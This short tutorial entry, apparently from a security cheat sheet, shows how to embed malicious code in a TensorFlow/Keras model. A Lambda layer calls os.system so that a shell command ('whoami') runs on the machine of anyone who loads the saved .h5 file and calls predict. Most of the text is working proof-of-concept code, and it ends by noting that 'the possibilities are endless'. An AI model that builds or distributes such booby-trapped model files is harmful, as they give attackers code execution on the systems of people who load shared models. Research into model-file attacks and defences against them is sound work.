Creating Malicious Tensorflow Models¶
Tensorflow models can be created with malicious code embedded in them.
import tensorflow as tf
def exploit(x):
import os
cmd = "whoami"
os.system(cmd)
return x
model = tf.keras.Sequential()
model.add(tf.keras.layers.Input(shape=(64,)))
model.add(tf.keras.layers.Lambda(exploit))
model.compile()
model.save("exploit.h5")
If someone loads this model and runs it as follows:
import tensorflow as tf
model = tf.keras.models.load_model("exploit.h5")
model.predict(tf.zeros((1, 64)))
The whoami command will be executed on the system. This is a simple example, but the possibilities are endless.